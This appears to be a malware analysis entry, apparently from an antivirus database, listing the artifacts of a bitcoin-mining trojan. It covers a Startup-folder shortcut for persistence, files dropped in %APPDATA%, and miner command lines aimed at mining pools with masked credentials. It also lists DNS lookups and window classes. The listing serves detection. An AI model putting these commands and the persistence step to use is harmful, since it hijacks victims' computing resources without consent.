Техническая информация
- %HOMEPATH%\Start Menu\Programs\Startup\Runme.vbs.lnk
- '%APPDATA%\setx.exe' -o http://Ze############ade:1231@eu1.triplemining.com:8344 -g no -t 2 -T 45
- '%APPDATA%\setx.exe' -o http://ra##############k.com:btcarecoffee50@pool.50btc.com:8332 -g yes -t 2 -T 45
- '<SYSTEM32>\wscript.exe' "%APPDATA%\Runme.vbs"
- %APPDATA%\btc.il
- %APPDATA%\coinutil.dll
- %APPDATA%\setx.exe
- %APPDATA%\phatk.cl
- %APPDATA%\usft_ext.dll
- %APPDATA%\miner.dll
- %APPDATA%\phatk.ptx
- %APPDATA%\Runme.vbs
- 'eu#.###plemining.com':8344
- 'po##.50btc.com':8332
- DNS ASK eu#.###plemining.com
- DNS ASK po##.50btc.com
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: 'EDIT' WindowName: ''